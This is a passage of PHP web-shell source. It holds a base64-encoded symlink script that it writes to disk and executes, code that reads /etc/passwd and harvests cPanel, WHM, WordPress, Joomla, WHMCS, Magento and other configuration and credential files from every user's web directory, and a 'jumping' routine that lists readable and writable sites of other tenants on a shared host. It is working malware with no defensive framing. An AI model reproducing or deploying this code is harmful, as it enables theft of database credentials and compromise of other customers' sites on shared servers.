GVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
644.         $file = "idx_config/vhost.cin";
645.         $handle = fopen($file ,"w+");
646.         fwrite($handle ,base64_decode($vhost));
647.         fclose($handle);
648.         chmod($file, 0755);
649.         if(exe("cd idx_config && ./vhost.cin")) {
650.             echo "<center><a href='$link_config/idx_config'><font color=white>Done</font></a></center>";
651.         } else {
652.             echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=white>Done</font></a></center>";
653.         }
654.  
655.     } else {
656.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=white>Can't read /etc/passwd</font></pre>");
657.         while($passwd = fgets($etc)) {
658.             if($passwd == "" || !$etc) {
659.                 echo "<font color=white>Can't read /etc/passwd</font>";
660.             } else {
661.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
662.                 foreach($user_config[1] as $user_idx) {
663.                     $user_config_dir = "/home/$user_idx/public_html/";
664.                     if(is_readable($user_config_dir)) {
665.                         $grab_config = array(
666.                             "/home/$user_idx/.my.cnf" => "cpanel",
667.                             "/home/$user_idx/.accesshash" => "WHM-accesshash",
668.                             "$user_config_dir/po-content/config.php" => "Popoji",
669.                             "$user_config_dir/vdo_config.php" => "Voodoo",
670.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
671.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
672.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
673.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
674.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
675.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
676.                             "$user_config_dir/forum/config.php" => "phpBB",
677.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
678.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
679.                             "$user_config_dir/app/etc/local.xml" => "Magento",
680.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
681.                             "$user_config_dir/configuration.php" => "Joomla",
682.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
683.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
684.                             "$user_config_dir/wp-config.php" => "WordPress",
685.                             "$user_config_dir/admin/config.php" => "OpenCart",
686.                             "$user_config_dir/slconfig.php" => "Sitelok",
687.                             "$user_config_dir/application/config/database.php" => "Ellislab");
688.                         foreach($grab_config as $config => $nama_config) {
689.                             $ambil_config = file_get_contents($config);
690.                             if($ambil_config == '') {
691.                             } else {
692.                                 $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
693.                                 fputs($file_config,$ambil_config);
694.                             }
695.                         }
696.                     }      
697.                 }
698.             }  
699.         }
700.     echo "<center><a href='?dir=$dir/idx_config'><font color=white>Done</font></a></center>";
701.     }
702. } elseif($_GET['do'] == 'jumping') {
703.         echo "<center>";
704.     echo "<br>";
705.     echo "<b><font color=white>JUMPING</b></font>";
706.     echo "<br>";
707.     echo "<br>";
708.     $i = 0;
709.     echo "<div class='margin: 5px auto;'>";
710.     if(preg_match("/hsphere/", $dir)) {
711.         $urls = explode("\r\n", $_POST['url']);
712.         if(isset($_POST['jump'])) {
713.             echo "<pre>";
714.             foreach($urls as $url) {
715.                 $url = str_replace(array("http://","www."), "", strtolower($url));
716.                 $etc = "/etc/passwd";
717.                 $f = fopen($etc,"r");
718.                 while($gets = fgets($f)) {
719.                     $pecah = explode(":", $gets);
720.                     $user = $pecah[0];
721.                     $dir_user = "/hsphere/local/home/$user";
722.                     if(is_dir($dir_user) === true) {
723.                         $url_user = $dir_user."/".$url;
724.                         if(is_readable($url_user)) {
725.                             $i++;
726.                             $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=white>$url_user</font></a>";
727.                             if(is_writable($url_user)) {
728.                                 $jrw = "[<font color=white>RW</font>] <a href='?dir=$url_user'><font color=white>$url_user</font></a>";
729.                             }
730.                             echo $jrw."<br>";
731.                         }
732.                     }
733.                 }
734.             }
735.         if($i == 0) {
736.         } else {
737.             echo "<br>Total ".$i." in ".$ip;
738.         }
739.         echo "</pre>";
740.         } else {
741.             echo '<center>
742.                   <form method="post">
743.                   List Domains: <br>
744.                   <textarea name="url" style="width: 500px; height: 250px;">';
745.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
746.             while($getss = fgets($fp)) {
747.                 echo $getss;
748.             }
749.             echo  '</textarea><br>
750.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
751.                   </form></center>';
752.         }
753.     } elseif(preg_match("/vhosts|vhost/", $dir)) {
754.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
755.         $urls = explode("\r\n", $_POST['url']);
756.         if(isset($_POST['jump'])) {
757.             echo "<pre>";
758.             foreach($urls as $url) {
759.                 $url = str_replace("www.", "", $url);
760.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
761.                 if(is_dir($web_vh) === true) {
762.                     if(is_readable($web_vh)) {
763.                         $i++;
764.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=white>$web_vh</font></a>";
765.                         if(is_writable($web_vh)) {
766.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=white>$web_vh</font></a>";
767.                         }
768.                         echo $jrw."<br>";
769.                     }
770.                 }
771.             }
772.         if($i == 0) {
773.         } else {
774.             echo "<br>Total ".$i." in ".$ip;
775.         }
776.         echo "</pre>";
777.         } else {
778.             echo '<center>
779.                   <form method="post">
780.                   List Domains: <br>
781.                   <textarea name="url" style="width: 500px; height: 250px;">';
782.                   bing("ip:$ip");
783.             echo  '</textarea><br>
784.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
785.                   </form></center>';
786.         }
